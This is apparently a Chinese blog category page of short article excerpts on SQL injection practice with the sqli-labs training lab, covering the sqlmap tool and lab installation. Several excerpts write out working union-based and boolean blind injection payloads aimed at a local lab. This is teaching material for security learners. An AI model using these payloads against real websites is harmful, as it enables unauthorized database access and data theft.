Sqli注入
文章平均质量分 78
LztCode
学习一开始就是模仿的过程。
网络空间安全学习者
展开
-
sql注入--sqli-labs-less1~9
常规注入 127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入 127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入 127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入 127.原创 2020-10-23 22:38:36 · 99 阅读 · 0 评论 -
sqlmap的基本使用办法
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持13种数据库。 sqlmap工作流程 http://127.0.0.1/index.php?a=1&b=2&c=3 当给sqNmap这么一个url的时候,它会: 1.检测网站是否能够访问 2.检测是否有waf 3.判断可注入的参数 sqlmap目录介绍 doc目录,包含sqlmap的简要说明,具体使用说明、作者信息等。 extra目录,包含了sqlmap的额外功能,例如发出声响、运行c原创 2020-10-20 12:02:48 · 452 阅读 · 0 评论 -
sqli-labs 盲注命令
sql盲注 sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码 查版本。?id=1’and left(version(),1)=5–+ 查库名。?id=1’and ascii(substr(database(),1,1))=115–+ 查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+ 查表长。?id=1’and length(subst原创 2020-10-16 12:13:08 · 278 阅读 · 0 评论 -
Sqli_Edited_Version安装,完美解决php7.0+版本问题
新手上路,sqli安装 Github链接 https://github.com/Rinkish/Sqli_Edited_Version 解压Sqli_Edited_Version 先解压到phpstudy的www目录下,phpstudy教程很多,这里不介绍了。 修改Sqli配置文件,路径在 WWW\sqlilabs\sql-connections\db-creds.inc, 将配置文件用记事本或者Sublime打开db-creds.inc 修改你的用户名和密码。然后浏览器访问sqli,选择第二项rese原创 2020-09-27 12:34:06 · 428 阅读 · 0 评论